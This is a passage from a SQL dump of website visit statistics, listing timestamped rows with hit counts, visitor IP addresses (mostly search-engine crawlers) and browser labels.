2.205.134.182','other'),(454822,1570769681,21,21,0,0,'66.249.64.94','chrome'),(454823,1570769752,2,2,0,0,'66.249.64.16','chrome'),(454824,1570769829,1,1,0,0,'157.55.39.170','other'),(454825,1570769923,4,4,0,0,'66.249.64.66','chrome'),(454826,1570770003,3,3,0,0,'66.249.64.69','chrome'),(454827,1570770883,8,8,0,0,'66.249.64.94','chrome'),(454828,1570771631,1,1,0,0,'141.8.142.119','other'),(454829,1570771944,1,1,0,0,'207.46.13.8','other'),(454830,1570772082,6,6,0,0,'66.249.64.94','chrome'),(454831,1570772106,1,1,0,0,'157.55.39.170','other'),(454832,1570772150,2,2,0,0,'207.46.13.175','other'),(454833,1570772153,2,2,0,0,'66.249.64.66','chrome'),(454834,1570772418,1,1,0,0,'66.249.64.69','chrome'),(454835,1570772545,1,1,0,0,'95.108.213.3','other'),(454836,1570772843,1,1,0,0,'141.8.142.177','other'),(454837,1570773291,7,7,0,0,'66.249.64.94','chrome'),(454838,1570773377,5,5,0,0,'66.249.64.66','chrome'),(454839,1570774274,1,1,0,0,'37.9.113.10','other'),(454840,1570774426,1,1,0,0,'91.196.178.82','firefox'),(454841,1570774492,7,7,0,0,'66.249.64.94','chrome'),(454842,1570774612,1,1,0,0,'8.29.198.26','other'),(454843,1570774663,1,1,0,0,'8.29.198.25','other'),(454844,1570775029,3,3,0,0,'207.46.13.175','other'),(454845,1570775102,1,1,0,0,'66.249.64.66','chrome'),(454846,1570775218,1,1,0,0,'87.250.224.104','other'),(454847,1570775689,8,8,0,0,'66.249.64.94','chrome'),(454848,1570775890,1,1,0,0,'66.249.64.69','chrome'),(454849,1570776557,1,1,0,0,'37.9.113.200','other'),(454850,1570776885,10,10,0,0,'66.249.64.94','chrome'),(454851,1570776906,2,2,0,0,'66.249.64.69','chrome'),(454852,1570776985,1,1,0,0,'91.196.178.17','chrome'),(454853,1570777275,3,3,0,0,'66.249.64.66','chrome'),(454854,1570777351,1,1,0,0,'91.196.178.170','chrome'),(454855,1570777575,1,1,0,0,'91.196.177.134','chrome'),(454856,1570777834,1,1,0,0,'66.249.64.69','chrome'),(454857,1570778089,5,5,0,0,'66.249.64.94','chrome'),(454858,1570778460,1,1,0,0,'46.219.6.40','firefox'),(454859,1570778463,1,1,0,0,'157.55.39.170','other'),(454860,1570778465,1,1,0,0,'193.109.145.8','chrome'),(454861,1570778467,1,1,0,0,'207.46.13.175','other'),(454862,1570778738,4,4,0,0,'66.249.64.66','chrome'),(454863,1570778820,1,1,0,0,'141.8.132.37','other'),(454864,1570779059,7,7,0,0,'66.249.64.94','chrome'),(454865,1570779489,1,1,0,0,'141.8.132.2','other'),(454866,1570779960,3,3,0,0,'66.249.64.69','chrome'),(454867,1570780492,6,6,0,0,'66.249.64.94','chrome'),(454868,1570780501,1,1,0,0,'66.249.64.66','chrome'),(454869,1570781234,1,1,0,0,'207.46.13.8','other'),(454870,1570781236,1,1,0,0,'66.249.64.69','chrome'),(454871,1570781524,1,1,0,0,'66.249.64.18','chrome'),(454872,1570781683,1,1,0,0,'157.55.39.54','other'),(454873,1570781706,6,6,0,0,'66.249.64.94','chrome'),(454874,1570781719,2,2,0,0,'66.249.64.66','chrome'),(454875,1570782004,1,1,0,0,'141.8.132.37','other'),(454876,1570782886,6,6,0,0,'66.249.64.94','chrome'),(454877,1570782909,1,1,0,0,'66.249.64.69','chrome'),(454878,1570782910,1,1,0,0,'178.154.200.60','other'),(454879,1570783524,1,1,0,0,'66.249.64.66','chrome'),(454880,1570784085,8,8,0,0,'66.249.64.94','chrome'),(454881,1570784127,1,1,0,0,'66.249.64.69','chrome'),(454882,1570784510,1,1,0,0,'157.55.39.54','other'),(454883,1570784761,1,1,0,0,'91.124.182.170','chrome'),(454884,1570785287,7,7,0,0,'66.249.64.94','chrome'),(454885,1570785313,2,2,0,0,'66.249.64.69','chrome'),(454886,1570785468,1,1,0,0,'8.29.198.27','other'),(454887,1570785527,1,1,0,0,'8.29.198.25','other'),(454888,1570785742,3,3,0,0,'66.249.64.66','chrome'),(454889,1570786490,6,6,0,0,'66.249.64.94','chrome'),(454890,1570787155,1,1,0,0,'66.249.64.69','chrome'),(454891,1570787700,8,8,0,0,'66.249.64.94','chrome'),(454892,1570788375,1,1,0,0,'66.249.64.66','chrome'),(454893,1570788883,8,8,0,0,'66.249.64.94','chrome'),(454894,1570789432,1,1,0,0,'157.55.39.69','other'),(454895,1570789729,1,1,0,0,'207.46.13.79','other'),(454896,1570789766,1,1,0,0,'66.249.64.69','chrome'),(454897,1570790093,9,9,0,0,'66.249.64.94','chrome'),(454898,1570790106,1,1,0,0,'66.249.64.66','chrome'),(454899,1570790267,1,1,0,0,'178.154.200.71','other'),(454900,1570791299,10,10,0,0,'66.249.64.94','chrome'),(454901,1570791579,1,1,0,0,'66.249.64.66','chrome'),(454902,1570792298,1,1,0,0,'93.73.243.99','chrome'),(454903,1570792491,8,8,0,0,'66.249.64.94','chrome'),(454904,1570792558,3,3,0,0,'157.55.39.69','other'),(454905,1570792938,2,2,0,0,'157.55.39.254','other'),(454906,1570792943,1,1,0,0,'207.46.13.79','other'),(454907,1570793104,1,1,0,0,'66.249.64.69','chrome'),(454908,1570793116,2,2,0,0,'66.249.64.66','chrome'),(454909,1570793681,1,1,0,0,'109.74.154.72','chrome'),(454910,1570793685,7,7,0,0,'66.249.64.94','chrome'),(454911,1570793704,1,1,0,0,'207.46.13.3','other'),(454912,1570794261,1,1,0,0,'157.55.39.254','other'),(454913,1570794300,4,4,0,0,'66.249.64.66','chrome'),(454914,1570794705,1,1,0,0,'141.8.132.37','other'),(454915,1570794709,1,1,0,0,'66.249.64.16','chrome'),(454916,1570794789,11,11,0,0,'66.249.64.94','chrome'),(454917,1570795286,2,2,0,0,'157.55.39.69','other'),(454918,1570795406,2,2,0,0,'66.249.64.66','chrome'),(454919,1570796089,9,9,0,0,'66.249.64.94','chrome'),(454920,1570796111,1,1,0,0,'66.249.64.69','chrome'),(454921,1570796341,2,2,0,0,'8.29.198.26','other'),(454922,1570796832,1,1,0,0,'46.211.157.125','chrome'),(454923,1570797290,8,8,0,0,'66.249.64.94','chrome'),(454924,1570797307,1,1,0,0,'66.249.64.69','chrome'),(454925,1570797952,1,1,0,0,'66.249.64.66','chrome'),(454926,1570797957,1,1,0,0,'157.55.39.254','other'),(454927,1570798418,7,7,0,0,'66.249.64.94','chrome'),(454928,1570798664,2,2,0,0,'66.249.64.69','chrome'),(454929,1570799100,5,5,0,0,'66.249.64.66','chrome'),(454930,1570799690,6,6,0,0,'66.249.64.94','chrome'),(454931,1570799758,2,2,0,0,'66.249.64.69','chrome'),(454932,1570800350,1,1,0,0,'66.249.64.66','chrome'),(454933,1570800545,1,1,0,0,'91.124.182.170','chrome'),(454934,1570800890,10,10,0,0,'66.249.64.94','chrome'),(454935,1570801351,2,2,0,0,'66.249.64.69','chrome'),(454936,1570801369,1,1,0,0,'141.8.188.39','other'),(454937,1570801466,1,1,0,0,'45.136.108.44','firefox'),(454938,1570801471,1,1,0,0,'141.8.132.37','other'),(454939,1570801893,22,22,0,0,'66.249.64.94','chrome'),(454940,1570801990,1,1,0,0,'66.249.64.16','chrome'),(454941,1570802002,4,4,0,0,'66.249.64.66','chrome'),(454942,1570802529,1,1,0,0,'109.207.206.250','chrome'),(454943,1570802772,1,1,0,0,'66.249.64.69','chrome'),(454944,1570803281,9,9,0,0,'66.249.64.94','chrome'),(454945,1570803347,1,1,0,0,'66.249.64.66','chrome'),(454946,1570803699,2,2,0,0,'66.249.64.69','chrome'),(454947,1570804545,2,2,0,0,'66.249.64.66','chrome'),(454948,1570804547,7,7,0,0,'66.249.64.94','chrome'),(454949,1570804697,1,1,0,0,'141.8.142.119','other'),(454950,1570805073,1,1,0,0,'157.55.39.254','other'),(454951,1570805130,2,2,0,0,'157.55.39.69','other'),(454952,1570805756,3,3,0,0,'66.249.64.69','chrome'),(454953,1570805760,3,3,0,0,'66.249.64.66','chrome'),(454954,1570805773,1,1,0,0,'141.8.142.161','other'),(454955,1570805793,8,8,0,0,'66.249.64.94','chrome'),(454956,1570806689,2,2,0,0,'66.249.64.69','chrome'),(454957,1570806923,8,8,0,0,'66.249.64.94','chrome'),(454958,1570806924,4,4,0,0,'66.249.64.66','chrome'),(454959,1570807189,2,2,0,0,'8.29.198.27','other'),(454960,1570807207,1,1,0,0,'91.196.178.184','chrome'),(454961,1570807863,1,1,0,0,'157.55.39.199','other'),(454962,1570808103,2,2,0,0,'66.249.64.69','chrome'),(454963,1570808105,11,11,0,0,'66.249.64.94','chrome'),(454964,1570808484,4,4,0,0,'66.249.64.66','chrome'),(454965,1570808811,1,1,0,0,'46.96.36.99','chrome'),(454966,1570808908,1,1,0,0,'207.46.13.43','other'),(454967,1570809285,7,7,0,0,'66.249.64.94','chrome'),(454968,1570809363,1,1,0,0,'5.45.207.49','other'),(454969,1570809381,1,1,0,0,'141.8.188.66','other'),(454970,1570810370,1,1,0,0,'157.55.39.168','other'),(454971,1570810511,3,3,0,0,'66.249.64.66','chrome'),(454972,1570810512,2,2,0,0,'66.249.64.69','chrome'),(454973,1570810514,5,5,0,0,'66.249.64.94','chrome'),(454974,1570811689,8,8,0,0,'66.249.64.94','chrome'),(454975,1570811710,2,2,0,0,'66.249.64.69','chrome'),(454976,1570812196,1,1,0,0,'66.249.64.16','chrome'),(454977,1570812683,8,8,0,0,'66.249.64.94','chrome'),(454978,1570812917,3,3,0,0,'66.249.64.69','chrome'),(454979,1570812922,2,2,0,0,'66.249.64.66','chrome'),(454980,1570812969,3,3,0,0,'46.211.129.26','chrome'),(454981,1570813584,4,4,0,0,'66.249.64.94','chrome'),(454982,1570814028,1,1,0,0,'46.211.129.26','chrome'),(454983,1570814107,2,1,1,0,'66.249.64.69',''),(454984,1570814109,3,3,0,0,'66.249.64.66','chrome'),(454985,1570814450,3,1,2,0,'207.46.13.225',''),(454986,1570814526,2,2,0,0,'157.55.39.254','other'),(454987,1570814703,2,2,0,0,'66.249.64.69','chrome'),(454988,1570814707,6,6,0,0,'66.249.64.94','chrome'),(454989,1570815789,4,4,0,0,'66.249.64.69','chrome'),(454990,1570815894,7,7,0,0,'66.249.64.94','chrome'),(454991,1570816358,1,1,0,0,'141.8.142.119','other'),(454992,1570816513,1,1,0,0,'66.249.64.66','chrome'),(454993,1570816701,2,2,0,0,'66.249.64.69','chrome'),(454994,1570816931,10,10,0,0,'66.249.64.94','chrome'),(454995,1570817070,1,1,0,0,'46.201.101.1','firefox'),(454996,1570818037,1,1,0,0,'8.29.198.25','other'),(454997,1570818191,1,1,0,0,'8.29.198.26','other'),(454998,1570818299,10,10,0,0,'66.249.64.94','chrome'),(454999,1570818451,1,1,0,0,'66.249.64.66','chrome'),(455000,1570819493,8,8,0,0,'66.249.64.94','chrome'),(455001,1570819503,1,1,0,0,'66.249.64.69','chrome'),(455002,1570820127,1,1,0,0,'77.222.143.222','msie'),(455003,1570820170,1,1,0,0,'66.249.64.66','chrome'),(455004,1570820695,9,9,0,0,'66.249.64.94','chrome'),(455005,1570821304,2,2,0,0,'66.249.64.69','chrome'),(455006,1570821740,1,1,0,0,'46.211.145.137','chrome'),(455007,1570821892,10,10,0,0,'66.249.64.94','chrome'),(455008,1570822178,1,1,0,0,'66.249.64.66','chrome'),(455009,1570823089,7,7,0,0,'66.249.64.94','chrome'),(455010,1570823102,1,1,0,0,'91.196.178.17','chrome'),(455011,1570823114,2,2,0,0,'66.249.64.66','chrome'),(455012,1570823748,3,3,0,0,'66.249.64.69','chrome'),(455013,1570824305,8,8,0,0,'66.249.64.94','chrome'),(455014,1570824307,1,1,0,0,'66.249.64.66','chrome'),(455015,1570825487,8,8,0,0,'66.249.64.94','chrome'),(455016,1570825492,1,1,0,0,'66.249.79.172','chrome'),(455017,1570825513,2,2,0,0,'66.249.64.66','chrome'),(455018,1570825737,1,1,0,0,'157.55.39.168','other'),(455019,1570825771,1,1,0,0,'157.55.39.131','other'),(455020,1570826757,3,3,0,0,'66.249.64.66','chrome'),(455021,1570826758,3,3,0,0,'66.249.64.69','chrome'),(455022,1570826760,6,6,0,0,'66.249.64.94','chrome'),(455023,1570826903,1,1,0,0,'66.249.64.18','chrome'),(455024,1570827889,7,7,0,0,'66.249.64.94','chrome'),(455025,1570827946,2,2,0,0,'66.249.64.69','chrome'),(455026,1570828169,2,2,0,0,'66.249.64.66','chrome'),(455027,1570828816,7,7,0,0,'66.249.64.94','chrome'),(455028,1570828900,1,1,0,0,'8.29.198.26','other'),(455029,1570828991,1,1,0,0,'213.180.203.37','other'),(455030,1570829088,1,1,0,0,'8.29.198.27','other'),(455031,1570829105,2,2,0,0,'66.249.64.69','chrome'),(455032,1570829763,2,2,0,0,'66.249.64.66','chrome'),(455033,1570829836,5,5,0,0,'66.249.64.94','chrome'),(455034,1570829978,1,1,0,0,'207.46.13.225','other'),(455035,1570830897,8,8,0,0,'66.249.64.94','chrome'),(455036,1570830972,4,4,0,0,'66.249.64.69','chrome'),(455037,1570831513,1,1,0,0,'213.180.203.44','other'),(455038,1570832097,10,10,0,0,'66.249.64.94','chrome'),(455039,1570832764,2,2,0,0,'66.249.64.69','chrome'),(455040,1570832987,1,1,0,0,'213.180.203.44','other'),(455041,1570833289,6,6,0,0,'66.249.64.94','chrome'),(455042,1570833901,8,8,0,0,'66.249.64.66','chrome'),(455043,1570834049,2,2,0,0,'66.249.64.69','chrome'),(455044,1570834196,16,16,0,0,'66.249.64.94','chrome'),(455045,1570834306,2,2,0,0,'157.245.235.139','other'),(455046,1570835131,4,4,0,0,'66.249.64.94','chrome'),(455047,1570835135,1,1,0,0,'66.249.64.66','chrome'),(455048,1570836311,9,9,0,0,'66.249.64.94','chrome'),(455049,1570836424,3,1,2,0,'207.46.13.225',''),(455050,1570837031,1,1,0,0,'66.249.64.69','chrome'),(455051,1570837511,9,9,0,0,'66.249.64.94','chrome'),(455052,1570838018,1,1,0,0,'207.46.13.225','other'),(455053,1570838113,1,1,0,0,'62.205.134.182','other'),(455054,1570838197,2,2,0,0,'66.249.64.66','chrome'),(455055,1570838710,11,11,0,0,'66.249.64.94','chrome'),(455056,1570839143,1,1,0,0,'66.249.64.66','chrome'),(455057,1570839385,1,1,0,0,'66.249.64.69','chrome'),(455058,1570839742,1,1,0,0,'8.29.198.27','other'),(455059,1570839912,10,10,0,0,'66.249.64.94','chrome'),(455060,1570839954,1,1,0,0,'8.29.198.26','other'),(455061,1570841107,12,12,0,0,'66.249.64.94','chrome'),(455062,1570841716,1,1,0,0,'66.249.64.66','chrome'),(455063,1570842081,1,1,0,0,'66.249.64.69','chrome'),(455064,1570842322,10,10,0,0,'66.249.64.94','chrome'),(455065,1570842487,1,1,0,0,'38.99.62.94','other'),(455066,1570842693,1,1,0,0,'207.46.13.156','other'),(455067,1570842869,1,1,0,0,'141.8.188.25','other'),(455068,1570842909,3,3,0,0,'66.249.64.66','chrome'),(455069,1570843504,6,6,0,0,'66.249.64.94','chrome'),(455070,1570843506,1,1,0,0,'66.249.64.69','chrome'),(455071,1570843820,2,2,0,0,'66.249.64.66','chrome'),(455072,1570844717,10,10,0,0,'66.249.64.94','chrome'),(455073,1570845025,1,1,0,0,'141.8.183.33','other'),(455074,1570845097,1,1,0,0,'141.8.132.19','other'),(455075,1570845458,4,4,0,0,'66.249.64.66','chrome'),(455076,1570845460,1,1,0,0,'157.55.39.74','other'),(455077,1570845956,8,8,0,0,'66.249.64.94','chrome'),(455078,1570846575,2,2,0,0,'66.249.64.69','chrome'),(455079,1570846831,1,1,0,0,'66.249.64.16','chrome'),(455080,1570847105,10,10,0,0,'66.249.64.94','chrome'),(455081,1570847645,2,2,0,0,'66.249.64.66','chrome'),(455082,1570848313,9,9,0,0,'66.249.64.94','chrome'),(455083,1570848582,1,1,0,0,'66.249.64.18','chrome'),(455084,1570848676,1,1,0,0,'66.249.64.69','chrome'),(455085,1570849516,11,11,0,0,'66.249.64.94','chrome'),(455086,1570849736,2,2,0,0,'207.46.13.2','other'),(455087,1570849752,1,1,0,0,'66.249.64.69','chrome'),(455088,1570849784,1,1,0,0,'141.8.142.161','other'),(455089,1570849927,1,1,0,0,'66.249.64.66','chrome'),(455090,1570850587,1,1,0,0,'8.29.198.26','other'),(455091,1570850712,10,10,0,0,'66.249.64.94','chrome'),(455092,1570850817,1,1,0,0,'8.29.198.27','other'),(455093,1570851917,9,9,0,0,'66.249.64.94','chrome'),(455094,1570852036,1,1,0,0,'141.8.183.18','other'),(455095,1570852582,2,2,0,0,'66.249.64.66','chrome'),(455096,1570852665,1,1,0,0,'157.55.39.213','other'),(455097,1570853033,1,1,0,0,'37.9.113.163','other'),(455098,1570853107,11,11,0,0,'66.249.64.94','chrome'),(455099,1570854305,9,9,0,0,'66.249.64.94','chrome'),(455100,1570854423,1,1,0,0,'66.249.64.66','chrome'),(455101,1570855510,9,9,0,0,'66.249.64.94','chrome'),(455102,1570855583,1,1,0,0,'62.205.134.182','other'),(455103,1570856158,2,2,0,0,'91.196.178.133','firefox'),(455104,1570856182,1,1,0,0,'66.249.64.69','chrome'),(455105,1570856401,3,3,0,0,'193.106.30.99','firefox'),(455106,1570856739,6,6,0,0,'66.249.64.94','chrome'),(455107,1570856878,1,1,0,0,'157.55.39.162','other'),(455108,1570857215,1,1,0,0,'165.22.93.129','firefox'),(455109,1570857372,3,3,0,0,'66.249.64.66','chrome'),(455110,1570857374,3,3,0,0,'66.249.64.69','chrome'),(455111,1570857410,1,1,0,0,'188.165.218.34','chrome'),(455112,1570857916,11,11,0,0,'66.249.64.94','chrome'),(455113,1570859113,9,9,0,0,'66.249.64.94','chrome'),(455114,1570859166,1,1,0,0,'66.249.64.69','chrome'),(455115,1570860307,9,9,0,0,'66.249.64.94','chrome'),(455116,1570860983,1,1,0,0,'66.249.64.66','chrome'),(455117,1570861421,2,2,0,0,'8.29.198.26','other'),(455118,1570861522,10,10,0,0,'66.249.64.94','chrome'),(455119,1570861622,2,2,0,0,'31.13.127.23','other'),(455120,1570861623,1,1,0,0,'31.13.127.14','other'),(455125,1570862708,10,10,0,0,'66.249.64.94','chrome'),(455126,1570863412,1,1,0,0,'141.8.142.44','other'),(455127,1570863912,1,1,0,0,'157.55.39.213','other'),(455128,1570863913,10,10,0,0,'66.249.64.94','chrome'),(455129,1570864118,1,1,0,0,'157.55.39.223','other'),(455130,1570865180,2,2,0,0,'66.249.64.66','chrome'),(455131,1570865181,3,3,0,0,'66.249.64.69','chrome'),(455132,1570865183,7,7,0,0,'66.249.64.94','chrome'),(455133,1570866321,10,10,0,0,'66.249.64.94','chrome'),(455134,1570866332,1,1,0,0,'157.55.39.213','other'),(455135,1570866867,1,1,0,0,'157.55.39.162','other'),(455136,1570866889,1,1,0,0,'91.196.178.71','chrome'),(455137,1570867086,1,1,0,0,'178.154.200.33','other'),(455138,1570867511,10,10,0,0,'66.249.64.94','chrome'),(455139,1570868468,3,3,0,0,'66.249.64.69','chrome'),(455140,1570868614,1,1,0,0,'138.201.255.235','other'),(455141,1570868791,4,4,0,0,'66.249.64.66','chrome'),(455142,1570868830,1,1,0,0,'91.196.178.71','chrome'),(455143,1570869452,9,9,0,0,'66.249.64.94','chrome'),(455144,1570869454,2,2,0,0,'66.249.64.69','chrome'),(455145,1570870408,3,3,0,0,'66.249.64.66','chrome'),(455146,1570870518,15,15,0,0,'66.249.64.94','chrome'),(455147,1570870981,6,6,0,0,'66.249.64.69','chrome'),(455148,1570871449,11,11,0,0,'66.249.64.94','chrome'),(455149,1570871529,1,1,0,0,'66.249.64.66','chrome'),(455150,1570872267,2,2,0,0,'8.29.198.25','other'),(455151,1570872367,5,5,0,0,'66.249.64.94','chrome'),(455152,1570872911,2,2,0,0,'66.249.64.66','chrome'),(455153,1570873516,11,11,0,0,'66.249.64.94','chrome'),(455154,1570873847,1,1,0,0,'207.46.13.187','other'),(455155,1570874775,1,1,0,0,'66.249.64.66','chrome'),(455156,1570874777,10,10,0,0,'66.249.64.94','chrome'),(455157,1570875874,1,1,0,0,'37.73.216.16','chrome'),(455158,1570875884,1,1,0,0,'178.154.200.71','other'),(455159,1570875914,10,10,0,0,'66.249.64.94','chrome'),(455160,1570876671,1,1,0,0,'141.8.142.119','other'),(455161,1570877170,8,8,0,0,'66.249.64.94','chrome'),(455162,1570877171,3,3,0,0,'66.249.64.69','chrome'),(455163,1570877172,2,2,0,0,'66.249.64.66','chrome'),(455164,1570877599,1,1,0,0,'157.55.39.49','other'),(455165,1570878294,1,1,0,0,'207.46.13.187','other'),(455166,1570878338,9,9,0,0,'66.249.64.94','chrome'),(455167,1570878518,2,2,0,0,'66.249.64.66','chrome'),(455168,1570878692,1,1,0,0,'66.249.64.69','chrome'),(455169,1570879004,2,2,0,0,'13.66.139.0','other'),(455170,1570879465,2,2,0,0,'207.46.13.194','other'),(455171,1570879470,2,2,0,0,'157.55.39.49','other'),(455172,1570879474,1,1,0,0,'207.46.13.187','other'),(455173,1570879519,7,7,0,0,'66.249.64.94','chrome'),(455174,1570879783,1,1,0,0,'109.74.154.72','chrome'),(455175,1570880162,1,1,0,0,'66.249.64.69','chrome'),(455176,1570880163,2,2,0,0,'66.249.64.66','chrome'),(455177,1570880721,10,10,0,0,'66.249.64.94','chrome'),(455178,1570881034,1,1,0,0,'207.46.13.206','other'),(455179,1570881391,1,1,0,0,'66.249.64.66','chrome'),(455180,1570881832,1,1,0,0,'138.201.255.235','other'),(455181,1570881914,9,9,0,0,'66.249.64.94','chrome'),(455182,1570881989,1,1,0,0,'66.249.64.69','chrome'),(455183,1570883120,2,2,0,0,'8.29.198.27','other'),(455185,1570883122,10,10,0,0,'66.249.64.94','chrome'),(455186,1570883599,2,2,0,0,'66.249.64.69','chrome'),(455187,1570883678,1,1,0,0,'157.55.39.49','other'),(455188,1570883844,1,1,0,0,'207.46.13.187','other'),(455189,1570884392,2,2,0,0,'66.249.64.66','chrome'),(455190,1570884395,7,7,0,0,'66.249.64.94','chrome'),(455191,1570884449,1,1,0,0,'213.180.203.44','other'),(455192,1570885535,12,12,0,0,'66.249.64.94','chrome'),(455193,1570885777,1,1,0,0,'46.211.236.67','chrome'),(455194,1570886739,8,8,0,0,'66.249.64.94','chrome'),(455195,1570886820,2,2,0,0,'66.249.64.69','chrome'),(455196,1570886848,1,1,0,0,'157.55.39.49','other'),(455197,1570887367,2,2,0,0,'66.249.64.66','chrome'),(455198,1570887890,2,2,0,0,'66.249.64.69','chrome'),(455199,1570887936,9,9,0,0,'66.249.64.94','chrome'),(455200,1570888320,1,1,0,0,'213.180.203.44','other'),(455201,1570888786,1,1,0,0,'157.55.39.49','other'),(455202,1570889114,10,10,0,0,'66.249.64.94','chrome'),(455203,1570889500,1,1,0,0,'207.46.13.194','other'),(455204,1570890433,4,4,0,0,'66.249.64.66','chrome'),(455205,1570890442,6,6,0,0,'66.249.64.94','chrome'),(455206,1570890778,1,1,0,0,'66.249.64.69','chrome'),(455207,1570891217,1,1,0,0,'207.46.13.97','other'),(455208,1570891516,5,5,0,0,'66.249.64.94','chrome'),(455209,1570892245,1,1,0,0,'157.55.39.49','other'),(455210,1570892504,2,2,0,0,'66.249.64.66','chrome'),(455211,1570892528,1,1,0,0,'66.249.64.69','chrome'),(455212,1570892559,2,2,0,0,'66.249.64.94','chrome'),(455214,1570893121,2,2,0,0,'35.239.244.215','chrome'),(455215,1570893254,1,1,0,0,'138.201.255.235','other'),(455216,1570893592,4,4,0,0,'66.249.64.66','chrome'),(455217,1570893608,3,3,0,0,'66.249.64.94','chrome'),(455218,1570893965,1,1,0,0,'8.29.198.26','other'),(455219,1570894115,3,3,0,0,'66.249.64.69','chrome'),(455220,1570894289,1,1,0,0,'8.29.198.27','other'),(455221,1570894562,3,3,0,0,'66.249.64.66','chrome'),(455222,1570894569,6,6,0,0,'66.249.64.94','chrome'),(455223,1570895123,1,1,0,0,'207.46.13.86','other'),(455224,1570895515,3,3,0,0,'66.249.64.69','chrome'),(455225,1570895555,1,1,0,0,'178.128.146.87','firefox'),(455226,1570895654,1,1,0,0,'207.46.13.194','other'),(455227,1570895766,3,3,0,0,'66.249.64.66','chrome'),(455228,1570896699,11,11,0,0,'66.249.64.94','chrome'),(455229,1570896704,2,2,0,0,'66.249.64.66','chrome'),(455230,1570897198,1,1,0,0,'66.249.64.69','chrome'),(455231,1570897609,1,1,0,0,'213.180.203.44','other'),(455232,1570897611,1,1,0,0,'66.249.64.66','chrome'),(455233,1570898122,9,9,0,0,'66.249.64.94','chrome'),(455234,1570898257,1,1,0,0,'13.66.139.0','other'),(455235,1570898377,1,1,0,0,'66.249.64.69','chrome'),(455236,1570898379,1,1,0,0,'207.46.13.194','other'),(455237,1570898803,2,2,0,0,'66.249.64.66','chrome'),(455238,1570898960,1,1,0,0,'46.96.24.251','chrome'),(455239,1570899510,3,3,0,0,'66.249.64.69','chrome'),(455240,1570899519,7,7,0,0,'66.249.64.94','chrome'),(455241,1570899862,2,2,0,0,'66.249.64.66','chrome'),(455242,1570899951,1,1,0,0,'66.102.9.191','chrome'),(455243,1570900053,1,1,0,0,'207.46.13.86','other'),(455244,1570900328,1,1,0,0,'193.34.141.63','chrome'),(455245,1570900517,9,9,0,0,'66.249.64.94','chrome'),(455246,1570901215,1,1,0,0,'66.249.64.69','chrome'),(455247,1570901721,8,8,0,0,'66.249.64.94','chrome'),(455248,1570902308,3,3,0,0,'66.249.64.66','chrome'),(455249,1570902423,1,1,0,0,'207.46.13.194','other'),(455250,1570902936,8,8,0,0,'66.249.64.94','chrome'),(455251,1570903012,2,2,0,0,'66.249.64.69','chrome'),(455252,1570903876,1,1,0,0,'207.46.13.86','other'),(455253,1570904126,9,9,0,0,'66.249.64.94','chrome'),(455254,1570904205,3,3,0,0,'66.249.64.69','chrome'),(455255,1570904477,2,0,2,0,'207.46.13.97',''),(455256,1570904602,1,1,0,0,'213.180.203.44','other'),(455257,1570904667,1,1,0,0,'138.201.255.235','other'),(455258,1570904812,2,2,0,0,'8.29.198.27','other'),(455259,1570905322,2,0,2,0,'207.46.13.102',''),(455260,1570905335,10,10,0,0,'66.249.64.94','chrome'),(455261,1570906175,2,2,0,0,'207.46.13.97','other'),(455262,1570906526,7,7,0,0,'66.249.64.94','chrome'),(455263,1570906560,1,1,0,0,'66.249.64.69','chrome'),(455264,1570906562,2,2,0,0,'66.249.64.66','chrome'),(455265,1570907717,9,9,0,0,'66.249.64.94','chrome'),(455266,1570907769,1,1,0,0,'66.249.64.69','chrome'),(455267,1570908383,3,3,0,0,'66.249.64.66','chrome'),(455268,1570908519,2,2,0,0,'207.46.13.102','other'),(455269,1570908932,9,9,0,0,'66.249.64.94','chrome'),(455270,1570909561,1,1,0,0,'66.249.64.69','chrome'),(455271,1570909964,1,1,0,0,'207.46.13.73','other'),(455272,1570910153,10,10,0,0,'66.249.64.94','chrome'),(455273,1570911151,1,1,0,0,'52.162.161.148','other'),(455274,1570911328,10,10,0,0,'66.249.64.94','chrome'),(455275,1570911466,1,1,0,0,'66.249.64.66','chrome'),(455276,1570912525,10,10,0,0,'66.249.64.94','chrome'),(455277,1570913724,11,11,0,0,'66.249.64.94','chrome'),(455278,1570913794,1,1,0,0,'138.201.255.235','other'),(455279,1570913887,3,3,0,0,'66.249.64.66','chrome'),(455280,1570913986,1,1,0,0,'207.46.13.102','other'),(455281,1570914001,2,2,0,0,'66.249.64.69','chrome'),(455282,1570914259,1,1,0,0,'207.46.13.123','other'),(455283,1570915225,11,11,0,0,'66.249.64.94','chrome'),(455284,1570915289,1,1,0,0,'66.249.64.66','chrome'),(455285,1570915597,1,1,0,0,'213.180.203.44','other'),(455286,1570915656,2,2,0,0,'8.29.198.26','other'),(455287,1570915932,1,1,0,0,'128.124.132.98','other'),(455288,1570916051,1,1,0,0,'91.196.178.17','chrome'),(455289,1570916127,7,7,0,0,'66.249.64.94','chrome'),(455290,1570916326,1,1,0,0,'157.55.39.38','other'),(455291,1570916786,1,1,0,0,'66.249.64.66','chrome'),(455292,1570917316,9,9,0,0,'66.249.64.94','chrome'),(455293,1570918025,1,1,0,0,'66.249.64.66','chrome'),(455294,1570918055,2,2,0,0,'207.46.13.123','other'),(455295,1570918525,9,9,0,0,'66.249.64.94','chrome'),(455296,1570919172,1,1,0,0,'66.249.64.66','chrome'),(455297,1570919498,21,21,0,0,'104.197.39.17','firefox'),(455298,1570919650,1,1,0,0,'213.180.203.44','other'),(455299,1570919724,9,9,0,0,'66.249.64.94','chrome'),(455300,1570920078,3,1,2,0,'207.46.13.123',''),(455301,1570920394,2,2,0,0,'66.249.64.69','chrome'),(455302,1570920925,13,13,0,0,'66.249.64.94','chrome'),(455303,1570920976,1,1,0,0,'141.8.142.2','other'),(455304,1570921582,1,1,0,0,'66.249.64.66','chrome'),(455305,1570922119,10,10,0,0,'66.249.64.94','chrome'),(455306,1570922231,1,1,0,0,'95.152.62.128','chrome'),(455307,1570922330,1,1,0,0,'66.249.64.69','chrome'),(455308,1570923326,6,6,0,0,'66.249.64.94','chrome'),(455309,1570923373,2,2,0,0,'66.249.64.69','chrome'),(455310,1570923999,3,3,0,0,'66.249.64.66','chrome'),(455311,1570924512,1,1,0,0,'62.205.134.182','other'),(455312,1570924526,7,7,0,0,'66.249.64.94','chrome'),(455313,1570924807,2,2,0,0,'66.249.64.69','chrome'),(455314,1570924997,1,1,0,0,'138.201.255.235','other'),(455315,1570925168,1,1,0,0,'66.249.64.66','chrome'),(455316,1570925392,1,1,0,0,'92.240.137.57','chrome'),(455317,1570925724,10,10,0,0,'66.249.64.94','chrome'),(455318,1570926498,2,2,0,0,'8.29.198.27','other'),(455319,1570926931,9,9,0,0,'66.249.64.94','chrome'),(455320,1570926943,1,1,0,0,'52.162.161.148','other'),(455321,1570927653,2,2,